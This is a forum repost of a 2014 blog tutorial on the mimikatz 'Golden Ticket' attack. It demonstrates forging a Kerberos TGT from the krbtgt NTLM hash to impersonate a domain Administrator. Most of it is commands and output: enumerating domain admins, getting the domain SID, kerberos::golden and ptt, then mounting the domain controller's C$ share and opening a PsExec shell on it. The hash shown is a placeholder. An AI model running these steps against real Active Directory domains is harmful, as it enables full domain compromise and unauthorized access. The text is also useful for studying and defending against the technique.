mimikatz - Golden Ticket

[Nytro]

[h=1]mimikatz - Golden Ticket[/h]

[h=2]Introduction[/h] We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain.

Here is the list of what you need to make it work:

krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)

Username that we'd like to impersonate

As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while.

As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info. Domain name

Domain's SID

[h=2]Attack[/h]

When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example:

First we look for a domain administrator:

Domain name

Domain's SID

C:\Users\evilhacker>net group "domain admins" /domain
The request will be processed at a domain controller for domain ctu.domain.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator         schema.Admin       Jack.Bauer

Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look like as if Administrator asked for an access to a share. Now let's get the Domain SID. Easiest way to do that is just use: "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe come in handy:

C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN

PsGetSid v1.44 - Translates SIDs to names and vice versa
Copyright (C) 1999-2008 Mark Russinovich
Sysinternals - www.sysinternals.com

SID for CTU.DOMAIN\CTU.DOMAIN:
S-1-1-12-123456789-1234567890-123456789

Now we have everything to start the attack. First we list the existing Kerberos tickets, if there is any we can those with the purge command (but it is not necessary) and then we can create the Golden Ticket and pass that.

C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  14 modules * * */


mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014
11:23:28 AM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : evilhacker @ CTU.DOMAIN
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
...

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
Admin  : Administrator
Domain : CTU.DOMAIN
SID    : S-1-1-12-123456789-1234567890-123456789
krbtgt : deadbeefboobbabe003133700009999
Ticket : Administrator.kiribi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # kerberos::ptt Administrator.kiribi
Ticket 'Administrator.kiribi' successfully submitted for current session

mimikatz # kerberos::list

[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034
 12:52:13 PM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : Administrator @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

mimikatz # kerberos::tgt
Keberos TGT of current session :
           Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1
/24/2034 12:52:13 PM
           Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN
           Target Name  (--) : @ CTU.DOMAIN
           Client Name  (01) : Administrator ; @ CTU.DOMAIN
           Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

           Session Key  (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37
           Ticket  (00 - 17) : [...]
(NULL session key means allowtgtsessionkey is not set to 1)

Now you can mount any share or use any RPC related tool that you like.

C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$
The command completed successfully.


C:\Users\evilhacker\Documents\mimikatz>net use
New connections will be remembered.


Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK           I:        \\dc01.ctu.domain\c$
                                                Microsoft Windows Network
The command completed successfully.


OR

C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe

PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>hostname
DC01

C:\Windows\system32>exit
cmd.exe exited on dc01.ctu.domain\ with error code 0.

Some additional notes:

Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT

[h=2]Mitigation[/h]

I am not aware of any good mitigation for this. Please let me know if you do.

[h=2]Greetings[/h]

Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz

[h=2]Author[/h] Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - rycon.hu - 2014. 01. 24.

Sursa: rycon.hu - mimikatz's Golden Ticket